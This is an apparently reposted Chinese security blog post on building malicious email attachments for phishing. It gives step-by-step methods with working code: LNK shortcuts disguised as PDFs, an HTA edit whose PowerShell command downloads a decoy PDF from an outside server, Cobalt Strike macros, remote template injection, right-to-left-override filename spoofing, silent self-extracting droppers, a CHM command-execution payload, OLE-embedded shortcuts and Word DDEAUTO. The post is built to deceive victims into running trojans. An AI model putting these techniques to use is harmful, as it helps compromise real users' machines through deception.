邮箱附件钓鱼常用技法

技术交流

关注微信公众号 Z20安全团队 , 回复加群，拉你入群一起讨论技术。

直接公众号文章复制过来的，排版可能有点乱，可以去公众号看。

INK

lnk⽂件，简单理解为快捷⽅式，创建⽅式如下：

下图为calc.exe的快捷⽅式的属性信息，我们可以在“⽬标”栏写⼊⾃⼰的恶意命令，如powershell上线命令：

然后运行，即可在CS上线。

⽽在实施钓⻥过程中，对于我们的calc.exe的快捷⽅式来说，⼀个⼤⼤的计算机ico图标，显然看起来不像⼀个好玩意，因此可以尝试在“属性”中去更改该⽂件的图标：

但是⽤系统⾃带的ico去做⽂件图标替换的话，有个弊端，即当替换的ico在⽬标机器上不存在时，就会出现类似空⽩ico图标：

比较好的方法是修改lnk的icon_location标志位，修改为相关后缀，系统即可⾃动联想到对应的打开⽅式：

用winhex或者010 Editor打开该LNK文件，找到String Data部分ICON_LOCATION字符串：

我们要将其修改为.\1.pdf(Unicode)，其长度0x07：

07002E005C0031002E00700064006600

我的pdf默认是由edge浏览器打开，则在icon_location中设置为pdf后缀时，⽂件的ico也会自动显示为edge浏览器打开的图标，这样可以达到⾃适配的效果：

当受害者中招打开我们的所谓的pdf，实则为恶意的快捷⽅式时，双击两下，什么反应都没有，可能会有⼀丝疑惑，因此可以当尝试⽤powershell、mshta等⽅式上线时，我们可以更改如cobaltstrike⽣成的代码，加上⼀段⾃动下载打开⼀份真的pdf，来达到逼真的效果，具体过程如下：

首先新建一指向%windir%\System32\mshta.exe的快捷方式(文件名尽量带有迷惑性)，并更改其图标为%SystemRoot%\System32\SHELL32.dll中任意一个：

使用CS生成一个powershell方式的HTA木马

打开hta文件，在其执行payload前增加如下语句：

Dim open_pdfSet open_pdf = CreateObject("Wscript.Shell")open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.50.15:8000/1.pdf',$env:temp+'\1.pdf');Start-Process $env:temp'\1.pdf'", 0, true

然后python起个http服务

这样一来，在受害者打开LNK文件后会从远程下载一正常PDF文档并打开。

接下来使用上面的方法修改快捷方式图标为pdf的图标。

使用CS设置HTA文件下载：

之后更改快捷方式的参数为HTA下载地址：

之后双击该LNK文件，主机便会上线，而受害者会看到一正常的PDF文档：

宏

生成office宏病毒文件，此程序包生成一个VBA宏，您可以将其嵌入到Microsoft Word或Excel文档中。此攻击适用于Windows上的x86和x64 Office

在word的视图功能中植⼊相关宏：

随便创建一个宏，将CS的Macro代码复制进去保存就可以。运行，word即可上线。（excel类似）

但是此种办法有个弊端，就是宏代码是存在本地的，极易被杀软查杀。

远程模板注入宏代码

因此我们可以尝试使⽤远程加载模板的⽅式在进⾏宏加载。

原理：

利用Word文档加载附加模板时的缺陷所发起的恶意请求，而达到的攻击目的，所以当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式，然后加载模板执行恶意模板的宏。

发送的文档本身不带恶意代码，所以能过很多静态检测。只需要在远程DOTM文档中编写宏病毒或者木马即可。

思路：

编写一个带有宏代码的DOTM文档，上传服务器

编写一个带模板的DOCX文档

将该文档压缩找到并更改settings.xml.rels文件中的内容，将其中的target内容修改为服务器上DOTM文档的URL

将DOCX解压后的内容再以存储模式压缩为ZIP

修改后缀名为DOCX，打开后即可实现远程注入宏文档

新建word, 打开宏代码编辑环境后，在本文档的ThisDocument下，编写如下宏代码

保存时保存类型为 dotm :

开启Web服务，放在其目录下， http://192.168.111.234/cs_macro.dotm

制作 docx

创建一个简历模板word文档：

将word文件后缀 docx 改为 zip,解压，找到settings.xml.rels

用文本编辑器打开，修改target项，可用的协议有ftp、smb、http，这里使用http:

将 target 内容改为http://192.168.111.234/cs_macro.dotm

之后全选目录所有文件，压缩为macro_test.zip,再将后缀改为docx

制作完成。

双击打开，启动宏，即可上线：

文件名反转RLO

RLO，即Right-to-Left Override，我们可以在⽂件名中插⼊此类unicode字符，来达到⽂件名反转的效果。

以calc.exe来举例，

将其重命名为calcgpj.exe,然后在 calc 与 g 之间右键，看图操作

ok，此时已经变成了以 jpg 结尾的了。但是双击运行还是 exe 格式运行的。

再利用ResourceHacker修改图标。

找个图片转换为 ico 格式。

http://www.bitbug.net/

如图，双击实际上还是运行的calc。

自解压

首先我们需要准备好木马(cmd.exe)、正常程序(calc.exe)

选中两个程序，然后添加到压缩文件,创建自解压

2.高级自解压选项，常规：解压路径 ——> 绝对路径：

路径写C:\windows\temp

3.高级自解压选项->设置

C:\windows\temp\选中的木马名

C:\windows\temp\选中的程序名

4.高级自解压选项->模式

静默模式->隐藏所有

5.高级自解压选项->更新

更新模式->解压并更新

覆盖模式->覆盖所有文件

6.确定

执行一下，发现达到了效果，在这里我们还需要做一些细节的伪装.

使用Resource Hacker换一下图标：

运行

自解压+RLO

将png图片和muma.exe自解压成 gnp.exe
RLO，文件名反转成 exe.png
修改exe.png图标，变成个图片
运行，看起来是个图⽚，后缀也是个图⽚，打开也是个图⽚，但是木马成功执行

双击，pikaexe.jpg

CHM 电子书

CHM（Compiled Help Manual）即“已编译的帮助文件”。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。

制作CHM需要用到一个工具 EasyCHM（http://www.etextwizard.com/）

新建一个html文件，编码格式ANSI，向里面写入如下内容

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'>

//这一排用于执行命令，注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行

<PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

用easychm，新建-浏览-选择html文件所在目录-编译

生成一个chm，双击，打开了计算器

office OLE+LNK

核心目标是创建一个内嵌的lnk文件诱导用户点击，从而执行命令。word，excel都能使用

我们创建一个快捷方式如下

其目标处填写的是

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc

然后打开word文件，插入对象，选择package，为了更加逼真勾选显示为图标，然后可以更改图标，我们在更改图标处选择一个迷惑性比较大的图标

然后进入创建软件包界面，选择我们刚刚创建的lnk文件，写好卷标名，然后就把软件包插入到word界面了，只要用户点击该软件包并选择执行，则会执行我们在lnk中定义的代码

捆绑文件

K8免杀系统自带捆绑器加强版V2.0.EXE

超级文件捆绑器

生成，执行之后会执行cmd.exe一样的效果，但此时后门软件也被执行了。

Word DDE

在word文件里，输入 ctrl+F9,进入到域代码编辑。我们可以键入以下代码使文件在被打开时执行系统命令（word2019复现未成功，word2016成功，似乎是word版本问题
这个蛮实用的，目前众多word是默认禁用宏的，dde只需要用户点击两个按钮即可执行，实用性比宏好

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

随后在打开该文件时会出现两个对话框，全点是就会执行以上命令了

技术交流

交流群

关注公众号回复“加群”，添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

邮箱附件钓鱼常用技法相关推荐

企业邮箱能传多大的附件？企业邮箱附件大小有限制吗？
企业邮箱是公司初创时常用的办公方式,工作安排.工作汇报.合同.发票等都需要使用到邮件.其中企业邮箱附件功能是大家常用且尤为关注的,分超大附件及普通附件.针对大文件的上传方法,下面小编具体分享下~ 企业 ...
特殊用户邮箱附件大小设置
1. 目标根据需求,在Exchange 2010邮件平台全局邮箱收发附件不大于10M的前提下,对特殊邮箱用户设置允许收发小于等于50M附件,普通用户不受影响. 2. 服务器端设置检查 2.1 检查传 ...
pcb外观维修_PCB电路板维修的一些常用技法
原标题:PCB电路板维修的一些常用技法由于现代的大部分电路板是没有官方原理图的,并且带程序的芯片应用越来越多,工程师必将面临各方面的挑战,通过大量的实践证明,面对这些挑战,依然有方法可遁,下面猎板P ...
python下载邮箱附件_基于Python3 下载邮箱附件，并解压到指定文件夹
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # -*- encoding: gbk -*- # 目前只测试过网易163邮箱,qq邮箱时间格式与163有 ...
邮箱附件、QQ、微信等社交工具大文件传输解决方案
工具说明:适用于邮箱附件.QQ.微信.钉钉.网盘等场景的大文件分割存储和传输. 下载地址:https://download.csdn.net/download/hj960511/85012515 作者 ...
outlook邮箱附件无法打开，提示无法创建文件
outlook邮箱附件无法打开,提示无法创建文件首先在C盘新建个文件夹temp0 在开始--运行框中输入--regedit 在HKEY_CURRENT_USER\Software\Microsoft ...
outlook邮箱邮件大小限制_outlook邮箱附件大小限制怎么办_outlook超出邮箱附件大小限制如何处理-win7之家...
我们在使用电脑办公时,常常需要进行邮件的接收和发送,这时有些用户就会选择通过outlook邮箱来完成,但是最近有的用户在发送邮件的时候却出现了outlook邮箱附件大小限制的情况,那么outlook邮 ...
公司企业邮箱附件多大？免费企业邮箱附件有限制吗？
相比免费邮箱,企业邮箱的一大优势是,可以发送合同.发票.图纸等大附件,存储时间长.TOM企业邮箱的大附件功能在新版做了进一步的优化,下面小编具体分享下~ 公司企业邮箱附件大小附件分为普通附件和超大附 ...
Asp.Net 下载邮箱附件（随手笔记）
下载QQ.outllook.网易邮件附件解决方案 1.注册QQ邮箱,并开启pop3 2.下载并引用程序集DLL:OpenPop.dll 3.创建EmailHelper对象 4.验证邮箱是否登录成功 ...

邮箱附件钓鱼常用技法

技术交流

交流群

邮箱附件钓鱼常用技法相关推荐

最新文章

热门文章